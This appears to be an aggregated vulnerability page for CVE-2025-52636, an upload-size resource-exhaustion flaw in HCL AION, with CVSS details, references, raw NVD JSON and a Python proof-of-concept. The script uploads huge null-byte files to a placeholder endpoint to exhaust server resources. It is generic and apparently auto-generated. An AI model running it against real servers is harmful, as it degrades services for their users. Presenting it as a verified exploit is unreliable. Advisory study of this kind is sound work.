CVE-2025-52636

Description

HCL AION is affected by a vulnerability related to the handling of upload size limits. Improper control or validation of upload sizes may allow excessive resource consumption, which could potentially lead to service degradation or denial-of-service conditions under certain scenarios.

CVSS Details

CVSS Score

1.8

Severity

LOW

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:hcltech:aion:*:*:*:*:*:*:*:* - VULNERABLE

HCL AION < 官方安全更新版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-52636 PoC - HCL AION File Upload Size Limit Bypass
# This PoC demonstrates uploading oversized files to exhaust server resources

import requests
import time
import sys
from requests.auth import HTTPBasicAuth

TARGET_URL = "https://target-server/api/upload"
USERNAME = "high_privilege_user"
PASSWORD = "password"

def create_oversized_file(size_mb):
    """Generate a large file for upload testing"""
    chunk_size = 1024 * 1024  # 1MB chunks
    return b'\x00' * (size_mb * chunk_size)

def upload_oversized_file(file_data, filename="large_file.bin"):
    """Upload oversized file to target server"""
    files = {'file': (filename, file_data, 'application/octet-stream')}
    
    try:
        response = requests.post(
            TARGET_URL,
            files=files,
            auth=HTTPBasicAuth(USERNAME, PASSWORD),
            timeout=300
        )
        return response.status_code, response.text
    except requests.exceptions.RequestException as e:
        return None, str(e)

def exploit_resource_exhaustion(file_size_mb=500):
    """
    Exploit CVE-2025-52636 by uploading oversized files
    to cause resource exhaustion on the server
    """
    print(f"[*] Creating {file_size_mb}MB file for upload test...")
    file_data = create_oversized_file(file_size_mb)
    
    print(f"[*] Uploading file to {TARGET_URL}...")
    status_code, response_text = upload_oversized_file(file_data)
    
    if status_code == 200:
        print("[+] File uploaded successfully - size limit not enforced!")
        print("[*] Server may be experiencing resource exhaustion")
    elif status_code == 413:
        print("[-] Request too large - size limit is enforced")
    else:
        print(f"[*] Response: {status_code} - {response_text}")

if __name__ == "__main__":
    file_size = int(sys.argv[1]) if len(sys.argv) > 1 else 500
    exploit_resource_exhaustion(file_size)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-52636
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-52636
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-52636/
[4] VulDB https://vuldb.com/cve/CVE-2025-52636
[5] https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129410

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-52636", "sourceIdentifier": "[email protected]", "published": "2026-03-16T15:16:17.890", "lastModified": "2026-04-25T18:04:06.973", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL AION is affected by a vulnerability related to the handling of upload size limits. Improper control or validation of upload sizes may allow excessive resource consumption, which could potentially lead to service degradation or denial-of-service conditions under certain scenarios."}, {"lang": "es", "value": "HCL AION se ve afectado por una vulnerabilidad relacionada con el manejo de los límites de tamaño de carga. Un control o validación inadecuados de los tamaños de carga puede permitir un consumo excesivo de recursos, lo que podría conducir potencialmente a la degradación del servicio o a condiciones de denegación de servicio bajo ciertos escenarios."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:N/I:N/A:L", "baseScore": 1.8, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.3, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:aion:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.1.2", "matchCriteriaId": "1AD0DD06-7840-4FFE-8BCF-1B94410B237D"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129410", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}